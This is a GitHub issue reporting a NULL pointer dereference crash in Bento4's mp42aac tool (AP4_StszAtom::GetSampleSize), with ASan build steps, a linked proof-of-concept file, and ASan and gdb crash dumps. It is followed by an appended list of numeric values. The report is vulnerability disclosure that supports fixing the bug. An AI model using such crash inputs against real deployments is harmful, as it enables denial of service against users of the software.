This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : NULL pointer dereference of Ap4StszAtom.cpp in function GetSampleSize Issue date: --- start body --- Hi I found an crash erro. System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Bento4 version 1.6.0.0 commit:0c7705733de80172712e487dd6fdd28387fd7184 [poc.zip](https://github.com/axiomatic-systems/Bento4/files/6463812/poc1.zip) ------------------------------------------ Verification steps: 1.Get the source code of Bento4 2.Compile the Bento4 ```bash $ cd Bento4 $ mkdir check_build && cd check_build $ cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" $ make -j 32 ``` 3.run mp42aac ```bash $ ./mp42aac poc.mp4 ``` asan ```bash Audio Track: duration: 0 ms sample count: 255 AddressSanitizer:DEADLYSIGNAL ================================================================= ==2609245==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006939ae bp 0x7fffb9ecb3f0 sp 0x7fffb9ecb250 T0) ==2609245==The signal is caused by a READ memory access. ==2609245==Hint: address points to the zero page. #0 0x6939ae in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /home/hh/Downloads/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 #1 0x57553f in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) /home/hh/Downloads/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp:162:30 #2 0x523d78 in AP4_Track::GetSample(unsigned int, AP4_Sample&) /home/hh/Downloads/Bento4/Source/C++/Core/Ap4Track.cpp:435:43 #3 0x523d78 in AP4_Track::ReadSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/hh/Downloads/Bento4/Source/C++/Core/Ap4Track.cpp:469:14 #4 0x4c8239 in WriteSamples(AP4_Track*, AP4_SampleDescription*, AP4_ByteStream*) /home/hh/Downloads/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:192:12 #5 0x4c8239 in main /home/hh/Downloads/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:281:13 #6 0x7ff7705870b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c8ad in _start (/home/hh/Downloads/Bento4/afl_fuzz/mp42aac+0x41c8ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hh/Downloads/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==2609245==ABORTING ``` gdb info ```bash Audio Track: duration: 0 ms sample count: 255 Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7fffffffddc0 --> 0x1 RCX: 0xc0e000000a6 --> 0x0 RDX: 0x7fffffffddb0 --> 0x60c000000000 --> 0xcc6e96b9 --> 0x0 RSI: 0x0 RDI: 0x607000000530 --> 0x0 RBP: 0x7fffffffde70 --> 0x7fffffffe1b0 --> 0x0 RSP: 0x7fffffffdcd0 --> 0xe60e4 RIP: 0x6939ae (<AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+302>: mov r8d,DWORD PTR [r8]) R8 : 0x0 R9 : 0x480 R10: 0x7fffffffdce0 --> 0x41b58ab3 R11: 0xffffffffbb0 --> 0x0 R12: 0x7fffffffddb0 --> 0x60c000000000 --> 0xcc6e96b9 --> 0x0 R13: 0xffffffffbb6 --> 0x0 R14: 0x10007fff7b9c --> 0xf204f204f1f1f1f1 R15: 0x7fffffffdd80 --> 0x0 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x69399e <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+286>: mov sil,BYTE PTR [rsi+0x7fff8000] 0x6939a5 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+293>: test sil,sil 0x6939a8 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+296>: jne 0x693a52 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+466> => 0x6939ae <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+302>: mov r8d,DWORD PTR [r8] 0x6939b1 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+305>: jmp 0x6939bb <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+315> 0x6939b3 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+307>: mov eax,0xfffffff4 0x6939b8 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+312>: xor r8d,r8d 0x6939bb <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+315>: mov rcx,rdx [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdcd0 --> 0xe60e4 0008| 0x7fffffffdcd8 --> 0x575540 (<AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&)+3552>: test eax,eax) 0016| 0x7fffffffdce0 --> 0x41b58ab3 0024| 0x7fffffffdce8 --> 0x71be85 ("10 32 4 9 chunk:104 48 4 8 skip:104 64 4 8 desc:104 80 8 10 offset:112 112 4 13 offset_32:114 128 4 8 size:124 144 4 14 cts_offset:140 160 8 7 dts:141 192 4 12 duration:142 208 4 15 sample_size:158") 0032| 0x7fffffffdcf0 --> 0x574760 (<AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&)>: lea rsp,[rsp-0x98]) 0040| 0x7fffffffdcf8 --> 0x60c000000100 --> 0x7059d0 --> 0x505850 (<AP4_MpegAudioSampleDescription::~AP4_MpegAudioSampleDescription()>: lea rsp,[rsp-0x98]) 0048| 0x7fffffffdd00 --> 0x1 0056| 0x7fffffffdd08 --> 0xfffffffffffffffe [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00000000006939ae in AP4_StszAtom::GetSampleSize (this=<optimized out>, sample=<optimized out>, sample_size=@0x7fffffffddb0: 0x0) at /home/hh/Downloads/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154 154 sample_size = m_Entries[sample - 1]; ``` --- end body ---
5,655
[ -0.0204120222479105, 0.0052501726895570755, -0.006331847980618477, 0.02064749039709568, 0.044385481625795364, 0.0020640131551772356, -0.03670337796211243, 0.04394397884607315, -0.014370829798281193, 0.02176595665514469, -0.03499624505639076, 0.016026455909013748, 0.01474610436707735, 0.03025747649371624, 0.02844732627272606, -0.011611453257501125, -0.028888825327157974, 0.005665918346494436, -0.03914634510874748, 0.01074317004531622, 0.04052971303462982, -0.022810840979218483, -0.015047796070575714, 0.04806464910507202, 0.001472586882300675, 0.020632773637771606, -0.021383322775363922, -0.0065084476955235004, -0.020205989480018616, -0.0066703311167657375, -0.00519130565226078, 0.010316386818885803, -0.01136127021163702, -0.002656359225511551, 0.03755694627761841, 0.011089012026786804, 0.0495951808989048, 0.06693141907453537, 0.011596737429499626, 0.028579775243997574, -0.015967588871717453, -0.04944801703095436, -0.016011739149689674, 0.010691661387681961, -0.019999956712126732, 0.025209657847881317, 0.012604828923940659, 0.012501812539994717, -0.03049294278025627, 0.0025147111155092716, 0.016247205436229706, -0.0030261154752224684, -0.012229553423821926, -0.06239868700504303, 0.020618056878447533, -0.03172914311289787, 0.014267812483012676, 0.02629869244992733, -0.000665929401293397, -0.00019453599816188216, -0.01468723826110363, 0.013362737372517586, 0.019205255433917046, 0.025018341839313507, -0.015408354811370373, 0.026887359097599983, -0.007343619130551815, 0.02110370621085167, -0.024782873690128326, 0.04114781320095062, -0.026960941031575203, -0.03087557666003704, 0.01760113798081875, 0.041854213923215866, 0.013929329812526703, -0.016085321083664894, 0.019013939425349236, 0.023737991228699684, -0.0445915125310421, 0.055805616080760956, -0.05100798234343529, 0.03225894272327423, -0.04962461441755295, 0.012244270183146, 0.028167709708213806, 0.010102994740009308, -0.041736479848623276, -0.07458408921957016, -0.02844732627272606, -0.033465709537267685, 0.01034582033753395, 0.01780717261135578, 0.020279573276638985, 0.012465020641684532, 0.001745765097439289, 0.030434075742959976, -0.028079409152269363, -0.017792455852031708, -0.06569521874189377, -0.012590112164616585, -0.03102274239063263, -0.014201587997376919, 0.011442212387919426, 0.022869708016514778, 0.025327391922473907, 0.00323950732126832, 0.007380410563200712, -0.021383322775363922, 0.01891092211008072, 0.12279590219259262, -0.007141264621168375, -0.010213369503617287, -0.01105222012847662, 0.004098592791706324, -0.01267105434089899, 0.018307538703083992, 0.00647901464253664, -0.039617277681827545, -0.03679167851805687, -0.03793957829475403, -0.023399507626891136, -0.026740191504359245, -0.03817504644393921, 0.015349487774074078, -0.022560657933354378, 0.051037415862083435, 0.0019481193739920855, -0.02022070623934269, -0.025003625079989433, -0.017174355685710907, -0.003337005153298378, -0.027505459263920784, -0.0008549466147087514, -0.022325189784169197, 0.004900651518255472, -0.01097863633185625, -0.026740191504359245, 0.031052175909280777, 0.02179539017379284, -0.004389247391372919, -0.05816028639674187, -0.004808672238141298, 0.043002113699913025, -0.0026085299905389547, -0.017821889370679855, -0.008623969741165638, -0.007240602280944586, 0.024282507598400116, -0.023973457515239716, -0.008822644129395485, -0.025930775329470634, -0.029712960124015808, 0.03564377874135971, 0.0019996277987957, 0.041501011699438095, 0.008807927370071411, 0.005069893319159746, 0.02425307407975197, 0.008270769380033016, 0.0017558828694745898, 0.016938889399170876, -0.03299477696418762, 0.028388459235429764, -0.03172914311289787, -0.0035117657389491796, -0.03664451092481613, 0.020500322803854942, 0.014716670848429203, -0.014157437719404697, 0.024238357320427895, 0.011699753813445568, 0.02598964236676693, -0.01267105434089899, 0.01484176330268383, -0.06175115332007408, -0.017174355685710907, 0.005551864393055439, 0.0389108806848526, -0.006644577253609896, -0.016276638954877853, -0.0013879660982638597, 0.01499628834426403, 0.024620991200208664, -0.0008011388126760721, -0.00116261700168252, -0.022928573191165924, 0.038616545498371124, -0.042766645550727844, 0.048417847603559494, 0.01972034014761448, 0.003055548993870616, 0.0006742075202055275, 0.02353195659816265, -0.0011249055387452245, 0.04052971303462982, -0.0013750889338552952, -0.031199343502521515, -0.029477491974830627, -0.007733610924333334, -0.0034400220029056072, 0.01226634532213211, -0.019661473110318184, -0.010647512041032314, -0.0016179140657186508, -0.02663717418909073, 0.004562167916446924, -0.014017629437148571, 0.046534113585948944, 0.0345253124833107, -0.011427495628595352, -0.020426739007234573, -0.028903542086482048, -0.011699753813445568, 0.013877821154892445, -0.009271502494812012, 0.015938155353069305, -0.03264157846570015, 0.03879314661026001, -0.009242069907486439, 0.011390703730285168, 0.0038336929865181446, -0.02756432443857193, 0.030816709622740746, -0.021206723526120186, -0.0352022759616375, -0.014459129422903061, 0.0030279550701379776, -0.0012877087574452162, -0.005710068624466658, 0.015540804713964462, 0.03552604466676712, -0.007866060361266136, -0.03905804455280304, 0.007155981380492449, 0.043620213866233826, -0.007726252544671297, 0.006931552197784185, -0.011258253827691078, -0.0006116616423241794, 0.008086810819804668, -0.026033790782094002, 0.03414267674088478, -0.02710810862481594, -0.017733588814735413, 0.013164062052965164, 0.054804883897304535, -0.025518707931041718, -0.004142743069678545, 0.0030647467356175184, 0.02114785648882389, 0.0034804928582161665, -0.0026986696757376194, 0.002573577919974923, 0.013333303853869438, -0.005206022411584854, -0.007667385973036289, 0.045621681958436966, -0.026960941031575203, -0.022545941174030304, -0.030434075742959976, 0.029050709679722786, -0.02675490826368332, -0.02236934006214142, -0.0069646649062633514, -0.012759353965520859, -0.016247205436229706, -0.014738745987415314, -0.014083854854106903, -0.02568059228360653, -0.026548875495791435, 0.023046307265758514, 0.007630594074726105, -0.00720013165846467, -0.03240611031651497, -0.02314932458102703, -0.00037918423186056316, 0.04253118112683296, 0.006284018512815237, 0.005654880777001381, 0.002895505167543888, 0.002075050724670291, 0.0015093785477802157, -0.003070265520364046, 0.03264157846570015, 0.0127078453078866, -0.00960998609662056, 0.026666607707738876, -0.03125821053981781, -0.031464241445064545, -0.009249428287148476, 0.006265623029321432, -0.0018699370557442307, -0.06422355026006699, 0.0008908184827305377, -0.010559211485087872, 0.0251066405326128, 0.002448486164212227, 0.017512839287519455, -0.023620257154107094, -0.008940378203988075, -0.019499588757753372, -0.004521697293967009, -0.00941867008805275, 0.02568059228360653, -0.02694622427225113, 0.0010568409925326705, 0.0006576512241736054, -0.0194848719984293, -0.022663673385977745, -0.01412800420075655, 0.0558939166367054, -0.0464458130300045, -0.02534210868179798, -0.0062361895106732845, -0.012295778840780258, -0.017615854740142822, -0.013701220974326134, -0.0197644904255867, -0.03564377874135971, 0.017041904851794243, -0.04821181669831276, 0.005901385098695755, -0.03299477696418762, 0.022442923858761787, -0.00013957843475509435, 0.004400284495204687, -0.014142720960080624, 0.02618095837533474, -0.06551861763000488, 0.02329649031162262, 0.015614388510584831, -0.02429722435772419, -0.010596003383398056, -0.03125821053981781, 0.018587155267596245, -0.022781407460570335, -0.01384102925658226, -0.0030353134498000145, 0.017733588814735413, 0.027843942865729332, -0.01695360615849495, 0.012104461900889874, 0.01952902227640152, -0.018292821943759918, -0.010757886804640293, 0.002106323605403304, 0.004267834592610598, -0.015378921292722225, 0.007273714989423752, 0.019632039591670036, 0.001113868085667491, 0.02744659222662449, 0.0026765945367515087, 0.007939644157886505, 0.00007628524326719344, -0.039970479905605316, -0.010927128605544567, -0.0062876977026462555, 0.01649738848209381, -0.006817497778683901, 0.006000722758471966, -0.013237645849585533, -0.0003591787535697222, 0.012126537039875984, 0.008712269365787506, 0.006434864364564419, 0.018484139814972878, 0.004735088907182217, -0.00016061867063399404, -0.009904319420456886, -0.01871960610151291, 0.04247231408953667, -0.03814561292529106, 0.02899184264242649, -0.018631305545568466, -0.018852055072784424, 0.012347287498414516, 0.01633550599217415, -0.046004313975572586, 0.014385546557605267, -0.026431141421198845, 0.019013939425349236, 0.03667394444346428, -0.04285494610667229, 0.03228837624192238, 0.01995580643415451, -0.010235444642603397, 0.04747598245739937, -0.024974191561341286, -0.0056401644833385944, -0.021633507683873177, 0.0326710119843483, -0.029904276132583618, -0.06681368499994278, -0.005886668339371681, 0.045003581792116165, -0.009440744295716286, -0.01242087036371231, -0.003360919887199998, -0.05256795138120651, 0.01938185654580593, -0.008013227954506874, 0.01034582033753395, 0.010080919601023197, 0.0061184559017419815, 0.04485641419887543, 0.018278105184435844, -0.01226634532213211, 0.02406175807118416, -0.0058903475292027, 0.026151524856686592, -0.022472357377409935, -0.02126559056341648, 0.001210446236655116, 0.032965343445539474, 0.013289154507219791, -0.019779205322265625, 0.009116977453231812, -0.007097114808857441, 0.03629131242632866, -0.009440744295716286, -0.002678434131667018, 0.005044138990342617, 0.005309039261192083, 0.033200811594724655, 0.031199343502521515, -0.028094125911593437, -0.0018634984735399485, 0.012619545683264732, -0.032612144947052, -0.009808661416172981, -0.0014643088215962052, 0.004260476212948561, 0.028020542114973068, 0.004175855312496424, -0.03964671120047569, 0.01503307931125164, -0.027740925550460815, -0.012310495600104332, -0.026828492060303688, -0.03920521214604378, 0.04568054899573326, -0.01640908792614937, -0.004499622154980898, 0.010522419586777687, -0.04933028295636177, -0.031464241445064545, -0.014172154478728771, 0.028359025716781616, -0.01910223998129368, -0.020309006795287132, 0.03290647640824318, 0.01902865618467331, 0.007770402356982231, 0.006037514191120863, -0.004514338914304972, -0.009529044851660728, 0.0028918259777128696, 0.04279607906937599, -0.007858702912926674, -0.01738038845360279, 0.015025721862912178, 0.01180277019739151, -0.012884445488452911, 0.012200120836496353, 0.02487117424607277, 0.0070419274270534515, -0.03087557666003704, 0.0042751929722726345, -0.01910223998129368, -0.011324478313326836, -0.004499622154980898, 0.03061067685484886, -0.0029488529544323683, 0.015658538788557053, 0.012075028382241726, -0.019131673499941826, -0.02410590834915638, -0.016247205436229706, -0.06757895648479462, -0.006942589767277241, -0.02584247477352619, -0.04364964738488197, 0.012406153604388237, 0.014113287441432476, -0.004396605771034956, -0.017115488648414612, 0.011464286595582962, 0.001179173239506781, 0.002113681985065341, 0.004988951608538628, -0.0017853161552920938, 0.005117722321301699, -0.0313759446144104, 0.015732120722532272, 0.0046578263863921165, -0.006225151941180229, -0.022737257182598114, 0.02114785648882389, 0.03793957829475403, -0.002314196666702628, -0.005342151504009962, 0.02033844031393528, -0.011986728757619858, 0.020205989480018616, -0.0452096126973629, -0.03278874233365059, 0.020853523164987564, -0.01580570451915264, -0.027785075828433037, 0.004808672238141298, -0.04047084599733353, 0.008763778023421764, -0.0364384800195694, -0.02437080815434456, -0.03752751275897026, -0.0026673965621739626, -0.03664451092481613, 0.024827023968100548, 0.014959496445953846, -0.013612921349704266, -0.035849809646606445, 0.001673101563937962, 0.020971257239580154, 0.017233222723007202, 0.020441455766558647, 0.02644585818052292, -0.010058844462037086, 0.016747571527957916, -0.011236178688704967, -0.0009427867480553687, -0.0063723186030983925, 0.0016022776253521442, 0.04097121208906174, -0.025960208848118782, -0.002198302885517478, -0.015467221848666668, 0.02663717418909073, 0.0024742402601987123, -0.02863864228129387, 0.01264897920191288, 0.058307450264692307, -0.015452505089342594, 0.013046328909695148, -0.055687885731458664, 0.03228837624192238, 0.015776271000504494, 0.02298744022846222, -0.0023325923830270767, 0.016659272834658623, 0.031699709594249725, -0.009749794378876686, 0.0053863017819821835, -0.012531246058642864, 0.007137585431337357, 0.01938185654580593, -0.022236891090869904, 0.023134607821702957, 0.017247939482331276, 0.03994104638695717, -0.004617355763912201, -0.0031953572761267424, 0.013877821154892445, -0.008211902342736721, -0.0010329263750463724, 0.007711535785347223, 0.011486361734569073, 0.029654093086719513, -0.02779979258775711, 0.013590846210718155, 0.004315664060413837, -0.015349487774074078, 0.02052975632250309, -0.011066936887800694, -0.01583513803780079, 0.005997043568640947, -0.021810106933116913, -0.02729942463338375, -0.03013974241912365, -0.023237623274326324, 0.03944068029522896, -0.027387725189328194, -0.022590089589357376, 0.018042638897895813, 0.02606322430074215, -0.0076453108340501785, 0.013311229646205902, -0.025548141449689865, 0.0009731398895382881, -0.02079465612769127, -0.0060669477097690105, 0.0067034438252449036, -0.03187631070613861, -0.00790285225957632, -0.008410577662289143, -0.017969055101275444, 0.007932285778224468, -0.015938155353069305, 0.02022070623934269, 0.0026434820611029863, -0.01051506120711565, 0.012693128548562527, -0.006306093651801348, -0.03228837624192238, -0.0030665863305330276, 0.02453269064426422, 0.0047829183749854565, 0.006390714552253485, -0.022781407460570335, 0.04485641419887543, -0.00154249113984406, 0.0007344539044424891, 0.061456818133592606, -0.00834435224533081, 0.005864593666046858, 0.012479737401008606, 0.03325967863202095, 0.010875619947910309, -0.01339952927082777, 0.01983807235956192, 0.014907987788319588, -0.05760105326771736, 0.008756419643759727, -0.018322255462408066, 0.00828548613935709, 0.00941867008805275, -0.00751653965562582, -0.0038778427988290787, 0.0007873419090174139, -0.03367174416780472, -0.044385481625795364, 0.0345253124833107, 0.01226634532213211, -0.03405437618494034, -0.020941823720932007, 0.02322290651500225, 0.04191308096051216, -0.008888869546353817, -0.012133895419538021, -0.018292821943759918, 0.02057390660047531, -0.005860914476215839, -0.011537870392203331, 0.00036331781302578747, -0.02498890832066536, 0.02710810862481594, 0.012008803896605968, 0.014392904937267303, 0.022060289978981018, 0.007660027593374252, -0.024547407403588295, -0.020559189841151237, 0.001091793063096702, 0.010809395462274551, 0.015246471390128136, -0.00970564503222704, 0.0602794848382473, 0.06239868700504303, -0.004006613977253437, -0.03293590992689133, -0.019779205322265625, -0.03894031047821045, -0.013907254673540592, 0.0011230659438297153, 0.011199386790394783, -0.0077483272179961205, -0.051655516028404236, -0.031817443668842316, 0.01738038845360279, 0.015790987759828568, -0.0059896851889789104, -0.03479021042585373, 0.00972772017121315, 0.030316343531012535, -0.007067681290209293, -0.014768179506063461, 0.007888135500252247, 0.00519130565226078, -0.02960994280874729, 0.0013870463008061051, -0.004415001254528761, 0.0009823378641158342, -0.004319343250244856, 0.009212636388838291, -0.015172888524830341, 0.013524620793759823, -0.011773336678743362, 0.011147878132760525, -0.006390714552253485, -0.06752008944749832, 0.010963920503854752, 0.011177311651408672, 0.039735011756420135, 0.019808638840913773, 0.02088295668363571, -0.0291831586509943, 0.025136074051260948, -0.01386310439556837, -0.019558455795049667, -0.019058089703321457, -0.014201587997376919, 0.002779611386358738, 0.004168496932834387, -0.026784341782331467, 0.0194554403424263, 0.03888144716620445, -0.001481784856878221, -0.014429695904254913, 0.0219572726637125, -0.0046136765740811825, -0.015246471390128136, 0.003995576407760382, -0.03172914311289787, 0.006195718422532082, 0.003929351456463337, -0.011272970587015152, -0.0018533808179199696, 0.003988218028098345, -0.0034804928582161665, 0.020941823720932007, -0.028844675049185753, -0.017615854740142822, -0.022163307294249535, -0.034230977296829224, 0.020205989480018616, -0.007689460646361113, -0.00018223377992399037, 0.020235422998666763, 0.015614388510584831, 0.004069159738719463, -0.027240559458732605, -0.024002891033887863, 0.02379685826599598, 0.0201029721647501, -0.02534210868179798, -0.02214859053492546, -0.00201434432528913, -0.0395289808511734, 0.0026232467498630285, 0.016438521444797516, 0.017821889370679855, -0.005235455930233002, -0.008425294421613216, -0.0056328061036765575, -0.004944801330566406, -0.017542272806167603, -0.005551864393055439, 0.01972034014761448, -0.029094859957695007, 0.013193495571613312, 0.01205295417457819, 0.00420896802097559, 0.0194848719984293, -0.04956574738025665, -0.023237623274326324, -0.009146410971879959, 0.019205255433917046, -0.0012766711879521608, -0.022325189784169197, 0.005496676545590162, 0.01007356122136116, 0.0070088147185742855, -0.0059050642885267735, 0.02236934006214142, 0.022001422941684723, -0.013730654492974281, 0.003991897217929363, -0.021559923887252808, 0.02345837466418743, -0.0026434820611029863, 0.01818980649113655, -0.01718907244503498, -0.015658538788557053, 0.0009193320875056088, 0.03717431053519249, 0.005220739170908928, -0.019322989508509636, 0.01262690406292677, 0.013436321169137955, 0.029094859957695007, -0.033848345279693604, 0.027888091281056404, -0.03281817585229874, 0.005824122577905655, -0.0073141856119036674, -0.026769625023007393, -0.003506246954202652, -0.017321521416306496, 0.023576106876134872, -0.004635751247406006, -0.021044839173555374, -0.019808638840913773, 0.04326701536774635, 0.0009713002946227789, -0.014966854825615883, -0.023355357348918915, 0.008601894602179527, 0.004713013768196106, -0.015496654435992241, -0.017468689009547234, 0.024135341867804527, 0.015938155353069305, -0.013134629465639591, -0.01368650421500206, -0.0002561620494816452, -0.01045619510114193, -0.004470189101994038, 0.022751973941922188, -0.03826334699988365, 0.001501100487075746, -0.009212636388838291, -0.010721094906330109, 0.018999222666025162, 0.006346564274281263, 0.026019074022769928, -0.010654870420694351, 0.003232148941606283, -0.007520218845456839, 0.010029411874711514, 0.01595287211239338, -0.00699777714908123, 0.0030205966904759407, -0.006887402385473251, -0.04005878046154976, 0.01826338842511177, -0.010404686443507671, 0.011883712373673916, 0.024885891005396843, 0.015511371195316315, 0.004974234849214554, -0.010110353119671345, 0.01097863633185625, 0.0015866410685703158, 0.03278874233365059, -0.022869708016514778, 0.03405437618494034, -0.0048270681872963905, -0.008587177842855453, -0.01564382202923298, 0.0445915125310421, -0.02076522260904312, -0.002571738325059414, -0.026784341782331467, -0.013524620793759823, -0.015702689066529274, -0.016011739149689674, -0.009153769351541996, -0.008013227954506874, -0.00583516014739871, -0.010559211485087872, 0.025592291727662086, 0.01399555429816246, -0.006637218873947859, 0.017674721777439117, 0.01267105434089899, 0.013296512886881828, -0.027196409180760384, -0.02014712244272232, 0.00309969880618155, -0.019779205322265625, 0.04547451436519623, 0.0002143115270882845, -0.013436321169137955, -0.01718907244503498, 0.0238704401999712, 0.008395860902965069, -0.01768943853676319, -0.03222950920462608, -0.017041904851794243, -0.0063539226539433, 0.009646777994930744, -0.014407620765268803, -0.002448486164212227, 0.01645323820412159, -0.026784341782331467, -0.0008774815360084176, -0.022075006738305092, 0.004558488726615906, -0.0016335505060851574, 0.02713754214346409, 0.00244112778455019, 0.01795433834195137, -0.005507714115083218, -0.003677328350022435, 0.03920521214604378, -0.05121401697397232, 0.002317875623703003, -0.013789520598948002, -0.039999913424253464, -0.018042638897895813, 0.008793211542069912, 0.003907276317477226, -0.046651847660541534, -0.002428250852972269, 0.05000725015997887, 0.030434075742959976, -0.0013061045901849866, -0.025548141449689865, -0.04217797890305519, -0.03184687718749046, -0.006438543554395437, -0.0011442211689427495, 0.008123602718114853, -0.011979370377957821, -0.01768943853676319, 0.009411311708390713, 0.030581243336200714, 0.02453269064426422, -0.02172180637717247, 0.029315609484910965, 0.04259004816412926, -0.0061993976123631, -0.011817486956715584, -0.03299477696418762, -0.028005825355648994, 0.0029746072832494974, -0.018660739064216614, 0.0027740926016122103, 0.0004403504135552794, 0.06357602030038834, -0.02610737457871437, -0.004484905395656824, 0.00022086504031904042, 0.02529795840382576, -0.0007068600971251726, -0.03564377874135971, -0.022810840979218483, 0.01799848861992359, -0.022943289950489998, 0.029977859929203987, 0.016350222751498222, -0.011133162304759026, -0.005647522397339344, 0.0052170599810779095, 0.012155970558524132, -0.006254585459828377, -0.002632444491609931, -0.009367161430418491, -0.011434854008257389, -0.03175857663154602, 0.005665918346494436, 0.003467615693807602, -0.000052456885896390304, -0.01614418812096119, -0.004293588921427727, 0.012818221002817154, 0.002641642466187477, -0.015025721862912178, -0.01969090662896633, 0.013546695932745934, -0.02994842641055584, -0.016364937648177147, -0.008447369560599327, -0.03167027607560158, -0.021280307322740555, 0.03579094633460045, -0.01795433834195137, -0.004716692958027124, -0.00511404313147068, 0.005224418360739946, 0.020470889285206795, 0.032082341611385345, -0.001348415040411055, -0.018675455823540688, 0.034849077463150024, 0.0013134629698470235, -0.03061067685484886, 0.02963937632739544, -0.0015673254383727908, -0.015452505089342594, 0.012575395405292511, -0.013465754687786102, 0.0018966110656037927, 0.04256061464548111, -0.010183936916291714, 0.00901396106928587, 0.00436349306255579, -0.029506925493478775, -0.013141987845301628, -0.013083120808005333, -0.003690205281600356, 0.0020180235151201487, 0.046033747494220734, -0.03355401009321213, 0.022428207099437714, -0.018822623416781425, 0.009565836749970913, 0.02937447652220726, -0.019896939396858215, -0.009514328092336655, 0.01757170632481575, -0.001462469226680696, 0.008609252981841564, -0.042266279458999634, 0.01902865618467331, -0.0011653763940557837, -0.003598226234316826, -0.023693840950727463, -0.001033846172504127, -0.04529791325330734, -0.03802787885069847, -0.023311207070946693, 0.013715937733650208, -0.004253117833286524, 0.01468723826110363, -0.00009422119183000177, 0.022943289950489998, 0.014083854854106903, -0.02503305859863758, -0.008660760708153248, -0.009661494754254818, -0.012560678645968437, 0.023737991228699684, -0.005665918346494436, 0.004885934758931398, -0.008874152787029743, -0.001334618078544736, 0.004974234849214554, 0.04220741242170334, 0.05524638295173645, -0.031699709594249725, -0.00771889416500926, -0.006442222744226456, -0.013296512886881828, -0.0005698110908269882, 0.014356113038957119, -0.006434864364564419, -0.004724051337689161, 0.018896205350756645, 0.018130939453840256, 0.0083075612783432, 0.02902127616107464, 0.006136851850897074, 0.012590112164616585, -0.008278127759695053, -0.01512873824685812, 0.028049975633621216, -0.04041197896003723, 0.003430824028328061, 0.012568037025630474, 0.04085347801446915, 0.01652682200074196, -0.048270683735609055, -0.0009841773426160216, 0.002442967379465699, 0.017277373000979424, 0.0049963099882006645, 0.00016061867063399404, -0.007214847952127457, -0.012251628562808037, 0.02291385643184185, 0.00018085409828927368, 0.037998445332050323, 0.0006272981408983469, 0.010264878161251545, 0.0024356089998036623, 0.002288442337885499, -0.011272970587015152, 0.013789520598948002, -0.021236157044768333, -0.014341396279633045, -0.015364204533398151, 0.014863838441669941, -0.04559224843978882, -0.016968322917819023, -0.023973457515239716, 0.00963206123560667, 0.014370829798281193, -0.009904319420456886, 0.014635729603469372, 0.013877821154892445, 0.007288431283086538, -0.015776271000504494, -0.011192028410732746, 0.030286910012364388, -0.017674721777439117, 0.014657804742455482, 0.009529044851660728, -0.0040618013590574265, -0.010640153661370277, -0.008042660541832447, -0.012884445488452911, -0.011604094877839088, 0.017247939482331276, -0.04691674932837486, -0.015040437690913677, 0.005445168353617191, -0.032847609370946884, 0.007236923091113567, -0.0005601532757282257, -0.014113287441432476, -0.0156879723072052, 0.02110370621085167, -0.020014673471450806, -0.031581975519657135, 0.010095636360347271, 0.03025747649371624, 0.08329635858535767, 0.006949948146939278, -0.003789542941376567, -0.025592291727662086, -0.014334037899971008, -0.0019683546852320433, 0.0035172845236957073, 0.008601894602179527, 0.001811070367693901, 0.010809395462274551, 0.014216304756700993, 0.010699019767343998, 0.011927861720323563, 0.020515039563179016, 0.008984527550637722, 0.01807207241654396, 0.0007132986793294549, -0.007520218845456839, 0.008108885958790779, -0.01158937904983759, 0.013061045669019222, -0.006375997792929411, 0.013333303853869438, -0.02367912419140339, 0.019970523193478584, -0.014613654464483261, -0.023428941145539284, -0.017939621582627296, -0.024208923801779747, -0.007185414899140596, -0.006155247800052166, 0.015231754630804062, -0.004278872162103653, -0.011456928215920925, 0.0073914481326937675, -0.01864602230489254, 0.014790254645049572, 0.012303137220442295, 0.0015360525576397777, -0.02410590834915638, 0.0046651847660541534, -0.03361287713050842, -0.0032413469161838293, 0.014444412663578987, -0.003184319706633687, -0.032200075685977936, 0.04370851442217827, -0.006762310396879911, -0.03025747649371624, 0.005051497370004654, -0.0014689078088849783, -0.0206916406750679, -0.006033835466951132, 0.030434075742959976, -0.0025588611606508493, 0.005882989149540663, -0.0023454695474356413, -0.017203789204359055, -0.019043372943997383, -0.011177311651408672, -0.0029267780482769012, 0.008351710624992847, 0.010367894545197487, 0.016467954963445663, 0.00963206123560667, -0.01370857935398817, -0.03275930881500244, -0.009801303036510944, -0.0018828141037374735, 0.005706389434635639, 0.005816764198243618, 0.0021173611748963594, 0.022384056821465492, 0.006482693832367659, 0.013767446391284466, 0.008013227954506874, -0.014643087983131409, 